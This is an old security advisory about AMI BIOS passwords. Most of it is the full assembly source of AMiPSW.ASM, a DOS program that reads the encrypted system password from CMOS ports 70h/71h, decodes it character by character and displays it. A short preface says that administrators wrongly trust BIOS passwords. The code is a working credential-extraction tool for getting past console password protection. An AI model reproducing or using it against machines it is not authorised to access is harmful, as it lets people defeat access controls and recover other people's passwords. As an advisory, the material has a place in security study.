COMMAND
BIOS
SYSTEMS AFFECTED
Systems running under AMI bios
PROBLEM
In recent, there are lots of host runs Linux, FreeBSD, etc...
Many administrarot believes that System Password that main board
support is fully secure to prevent the console hacker from
cracking in front of the system But, It is a very "Unsecure"
thought.
The following code worked a few years ago on a 486 machine. If
AMI hasn't changed things much, it may still work.
----------------------------------------------------------------------
; AMiPSW.ASM - Decodes and displays the Ami-Bios-Password!
; coded by mEsCaL/ThE SkeWerS
; v1.1 Toad Hall Tweak, 12 Mar 95
; - Minor optimizing (just can't resist)
; - Adding some comments
; David Kirschbaum, Toad Hall
CODE SEGMENT
ORG 100h
ASSUME CS:CODE,DS:CODE
Start PROC NEAR
; <-=-> THiS ONE READS THE ENCRYPTED PASSWORD FROM CMOS <-=->
mov cl,'[' ;Bracket the password v1.1
call CharOut ;display it v1.1
cld ;insure forward v1.1
mov cl,0b7h ;CMOS starting address
;v1.1 lea di,Password
mov di,offset Password ; v1.1
push di ;save for later v1.1
Read_Password:
mov al,cl ;CMOS address we want
out 70h,al
jmp $+2 ;delay a tick
in al,71h ;Get password char
;v1.1 mov [di],al ;stuff in buffer
;v1.1 inc di ;bump
stosb ;stuff in buffer v1.1
inc cl ;bump CMOS address
cmp cl,0b7h+7 ;done 7 chars yet?
jnz Read_Password ;not yet
; <-=-> NOW, WE HAVE TO DECRYPT CHAR BY CHAR <-=->
;v1.1 lea di,Password
pop di ;restore pointer to password v1.1
and byte ptr [di],0f0h ;mask first char
inc di ;point to next char
Decrypt_Next:
cmp di,Offset Password+7 ;hit end?
jnl Completed ;yep
cmp byte ptr [di],0 ;current char a 0?
jz Completed ;yep, 0 terminated
xor cl,cl ;handy 0
mov ch,byte ptr [di-1] ;get previous char
Decrypt:
inc cl ;build char in CL
mov ah,ch ;char to decrypt
xor dx,dx
test ah,10000000b
jz NotSet7
inc dh
NotSet7:
test ah,01000000b
jz NotSet6
inc dh
NotSet6:
test ah,00000010b
jz NotSet2
inc dh
NotSet2:
test ah,00000001b
jz NotSet1
inc dh
NotSet1:
add dl,2
cmp dl,dh
jl NotSet1 ;loop
sub dl,dh
shr ch,1
cmp dl,1
jnz $+5
add ch,80h
cmp ch,byte ptr [di] ;match next char?
jnz Decrypt ;nope, continue
; <-=-> AND FiNALLY, WE HAVE TO OUTPUT OUR DECRYPTED CHAR <-=->
mov ah,2 ;display char function
mov dl,cl ;this char
int 21h
inc di ;next char
jmp Decrypt_Next ;loop
; <-=-> THAT'S ALL? WELL, THAN LET'S QUiT DiZ SH**! :-) <-=->
Completed:
mov cl,']' ;Close the bracket v1.1
call CharOut ;display it v1.1
mov ax,4c00h ;terminate, ERRORLEVEL 0
int 21h
Start ENDP
;v1.1 New function: enter with char to display in CL
CharOut PROC NEAR ;v1.1
mov ah,2 ;display char function
mov dl,cl ;this char
int 21h
ret
CharOut ENDP
;Password DB 6 DUP (?)
Password label byte ;dynamic buffer v1.1
CODE ENDS
END Start